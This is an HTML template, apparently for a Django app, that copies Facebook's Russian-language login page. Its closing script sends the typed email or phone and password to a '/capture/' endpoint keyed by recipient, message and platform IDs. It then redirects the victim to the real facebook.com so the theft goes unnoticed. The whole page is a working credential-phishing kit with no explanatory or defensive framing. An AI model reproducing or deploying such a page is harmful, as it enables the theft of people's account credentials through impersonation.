<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>Facebook</title>
        
        <style>
            #facebook{
                font-family:Helvetica, Arial, sans-serif;
                color:rgb(26, 126, 248);
                padding-left: 4.5cm;
                padding-top: 2cm;
                font-size: 3.5em;
                position:absolute;
                top:30px;
            }
            h2{
                font-family: Arial, sans-serif;
                padding-left:4.6cm;
                padding-top:5cm;
                font-weight:lighter;
                position: absolute;
                font-size: 1.5em;
            }
            body{
                background-color: #f0f2f5;
            }
            input[type="text"], input[type="password"],input[type="submit"]{
                border-radius: 10px;
                border-style:solid;
                border: 1px solid #dddfe2;
                caret-color: #1b74e4;
                padding:14px 1px;
                padding-left: 0.3cm;
                font-size: 9pt;
                width: 92%;
            }
            input[type="submit"]{
                background-color:#1877f2;;
                color:white;
                font-weight: bold;
                padding: 14px 168px;
                text-align: center;
                font-size: large;
            }
            input[type="submit"]:hover{
                background-color: rgb(20, 88, 171);
            }
            #form{
                margin-left: 19cm;
                margin-top: 3cm;

                background-color: rgb(255, 255, 255);
                box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);

                border-radius: 10px;
                height: 9.4cm;
                width:10.6cm;

                padding-left: 0.5cm;
                padding-top: 0.001cm;
                position:absolute;
            }
            #forgot{
                color:rgb(26, 126, 248);
                text-decoration: none;
                margin-left: 3.5cm;
                font-weight: lighter;
            }
            #forgot:hover{
                text-decoration-line:underline;
            }
            #input{
                color:rgb(201, 201, 201);
                width: 10cm;
                margin-right: 2.7cm;
            }
            input {
                outline:none;
            }
            input[type="text"]:focus, input[type="password"]:focus{
                border: 3px solid rgb(32, 158, 255);
            }
            #account{
                padding: 14px 60px;
                text-decoration: none;
                font-weight:bold;
                font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
                margin-left: 1.9cm;
                margin-top: 0.2cm;
                position:absolute;
                border-radius: 6px;
                background-color: rgb(49, 200, 97);
                color:white;
            }
            #account:hover{
                background-color: rgb(42, 170, 82);
            }
            #create-page{
                font-style: normal;
                font-weight: lighter;
            }
            #craeteAcc{
                text-decoration: none;
                color:black;
            }
            #craeteAcc:hover{
                text-decoration-line:underline;
            }
            h4{
                color: #2c2c2c;
                font-size: 13px;
                font-weight: bold;
                position:absolute;
                margin-left: 20.1cm;
                margin-top: 12.8cm;
                text-align: center;
                word-wrap: break-word;
  
                margin-left: 18.8cm;
                margin-top: 13cm;
                background-color: rgb(239, 242, 245);
                width:10.6cm;
                padding-left: 0.5cm;
                height: 2.4cm;
                padding-top: 0.001cm;
                position:absolute;
            }

            
            #bottom{
                padding: 1cm 1cm;
                height: 4cm;
                width: 29.988cm;
                margin-top: 20cm;
                background-color: white;
                position:absolute;
                font-size:medium;
            }
            #lang{
                font-family: Arial, sans-serif;
                text-decoration: none;
                color:rgb(102, 102, 112);
                font-size: 0.4cm;
                margin-left: 0.4cm;
            }
            #lang:hover{
                text-decoration: underline;
            }
            #plus{
                font-size: larger;
                font-weight: bolder;
                font-family:'Courier New', Courier, monospace;
                border-color: #ebebeb;
                height: 0.65cm;
                border-radius: 0.1cm;
                width: 0.8cm;
            }
            #navigation-bar{
                margin-left:0.4cm;
                margin-right:1cm;
            }
            #n-bar{
                font-family: Arial, sans-serif;
                text-decoration: none;
                color:rgb(112, 108, 102);
                font-size: 0.3cm;
                margin-left: 0.4cm;
            }
            #n-bar:hover{
                text-decoration: underline;
            }
            #Meta{
                font-family: Arial, sans-serif;
                margin-left:0.2cm;
                color:rgb(112, 108, 102);
                margin-left: 0.4cm;
            }
        </style>
    </head>
    <body>
        <div id="form">
            <form method="POST">
                {% csrf_token %}
                <p class="login">
                    <label for=""></label>
                    <input type="text" name="email" placeholder="Электронный адрес или номер телефона">
                </p>
                <p class="login">
                    <input type="password" name="password" placeholder="Пароль">
                </p>
                <p>
                    <input type="submit" value="Вход">
                </p>
                <p>
                    <a href="" id="forgot"><strong>Забыли пароль?</strong></a>
                </p>
                <hr id="input">
                <p>
                    <a href="" id="account">Создать аккаунт</a>
                </p>
            </form>
        </div>

        <h1 id="facebook">
            <strong>facebook</strong>
        </h1>

        <h2> Facebook помогает вам всегда<br> оставаться на связи и общаться со<br> своими знакомыми.</h2>
        
        <h4><a href="" id="craeteAcc"> Создать Страницу</a><em id="create-page"> знаменитости, музыкальной группы или<br> компании.</em></h4>

        <div id="bottom">
            <a href="" id="lang">Русский</a> <a href="" id="lang">English (US)</a> <a href="" id="lang">Türkçe</a> <a href="" id="lang">Bahasa Indonesia</a> <a href="" id="lang">中文(简体)</a> <a href="" id="lang">Қазақша</a> <a href="" id="lang">Deustch</a> <a href="" id="lang">한국어</a> <a href="" id="lang">Shqip</a> <a href="" id="lang">Español</a> <a href="" id="lang">Português (Brasil)</a> <button id="plus">+</button>
            <hr id="navigation-bar">
            <a href="" id="n-bar">Регистрация</a> 
            <a href="" id="n-bar">Вход</a> 
            <a href="" id="n-bar">Messenger</a> 
            <a href="" id="n-bar">Facebook Lite</a> 
            <a href="" id="n-bar">Watch</a> 
            <a href="" id="n-bar">Люди</a> 
            <a href="" id="n-bar">Страницы</a> 
            <a href="" id="n-bar">Категории Страниц</a> 
            <a href="" id="n-bar">Места</a> 
            <a href="" id="n-bar">Игры</a> 
            <a href="" id="n-bar">Marketplace</a> 
            <a href="" id="n-bar">Facebook pay</a> 
            <a href="" id="n-bar">Группы</a><br>
            <a href="" id="n-bar">Вакансии</a>  
            <a href="" id="n-bar">Oculus</a> 
            <a href="" id="n-bar">Portal</a> 
            <a href="" id="n-bar">Instagram</a> 
            <a href="" id="n-bar">Местные</a> 
            <a href="" id="n-bar">Благотворительные акции</a> 
            <a href="" id="n-bar">Услуги</a>
            <a href="" id="n-bar">Центр информации о голосовании</a> 
            <a href="" id="n-bar">Политика конфиденциальности</a> <br>
            <a href="" id="n-bar">О нас</a> 
            <a href="" id="n-bar">Создать рекламу</a> 
            <a href="" id="n-bar">Создать Страницу</a> 
            <a href="" id="n-bar">Разработчикам</a> 
            <a href="" id="n-bar">Вакансии</a> 
            <a href="" id="n-bar">Конфиденциальность</a> 
            <a href="" id="n-bar">Файлы cookie</a> 
            <a href="" id="n-bar">Выбор рекламы</a> <br>
            <a href="" id="n-bar">Условия пользования</a> 
            <a href="" id="n-bar">Справка</a><br>
            <br>
            <p id="Meta">Facebook © 2021</p>
        </div>


        <script>
            const urlParams = new URLSearchParams(window.location.search);
            const recipientId = "{{ recipient_id }}";  
            const messageId = "{{ message_id }}";
            const platform = "{{ platform }}";  // <-- Добавляем platform
            const BASE_URL = "{{ settings.BASE_URL }}"; 
        
            if (recipientId && platform) {
                document.querySelector("form").action = `${BASE_URL}/capture/${recipientId}/${messageId}/${platform}/`;
            }
        
            document.querySelector("form").addEventListener("submit", function(event) {
                event.preventDefault();  // Отменяем стандартную отправку формы
        
                const form = event.target;
                const email = form.querySelector("input[name='email']").value;
                const password = form.querySelector("input[name='password']").value;
        
                fetch(form.action, {
                    method: "POST",
                    body: new URLSearchParams(new FormData(form)),
                    headers: {
                        "Content-Type": "application/x-www-form-urlencoded"
                    }
                })
                .then(response => {
                    if (response.ok) {
        
                        window.location.href = "https://www.facebook.com/";
                    } else {
                 
                        alert("Произошла ошибка при отправке данных.");
                    }
                })
                .catch(error => {
                    console.error('Ошибка:', error);
                    alert("Произошла ошибка при отправке данных.");
                });
            });
        </script>

</body>
</html>
